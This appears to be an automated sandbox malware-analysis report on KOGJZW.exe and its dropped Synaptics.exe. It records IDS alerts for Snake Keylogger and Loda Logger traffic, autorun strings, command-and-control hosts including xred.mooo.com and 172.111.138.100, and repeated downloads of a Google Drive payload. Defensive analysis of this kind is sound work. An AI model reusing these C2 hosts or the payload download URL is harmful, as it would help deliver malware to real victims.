Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50048 version: TLS 1.2

Source: KOGJZW.exe, 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: KOGJZW.exe, 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: KOGJZW.exe, 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe, 00000003.00000003.1413662003.0000000000535000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000003.00000003.1413662003.0000000000535000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000003.00000003.1413662003.0000000000535000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: KOGJZW.exe	Binary or memory string: [autorun]
Source: KOGJZW.exe	Binary or memory string: [autorun]
Source: KOGJZW.exe	Binary or memory string: autorun.inf

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042DD92 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0042DD92
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00462044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00462044
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0046219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0046219F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0045F350
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_004624A9
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00456B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_00456B3F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045FD47 FindFirstFileW,FindClose,	2_2_0045FD47
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0045FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0045FDD2
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00456E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_00456E4A
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_003D2044
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_003D219F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	9_2_003CF350
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	9_2_003D24A9
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	9_2_003C6B3F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003CFD47 FindFirstFileW,FindClose,	9_2_003CFD47
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039DD92 GetFileAttributesW,FindFirstFileW,FindClose,	9_2_0039DD92
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	9_2_003CFDD2
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	9_2_003C6E4A

Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: excel.exe

Memory has grown: Private usage: 1MB later: 69MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.10:49792 -> 69.42.215.252:80
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.10:49820 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:49820 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:49930 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50030 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50101 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.10:50115 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50115 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.10:50115
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49783 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49797 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49839 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49863 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49855 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49818 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49822 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49886 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49911 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49910 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49875 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49834 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49809 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49865 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49796 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49896 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49923 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49808 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49848 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49887 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49894 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49874 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49784 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49921 -> 216.58.206.46:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xred.mooo.com

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

Source: Joe Sandbox View	IP Address: 172.111.138.100 172.111.138.100
Source: Joe Sandbox View	IP Address: 69.42.215.252 69.42.215.252

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0046550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

2_2_0046550C

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
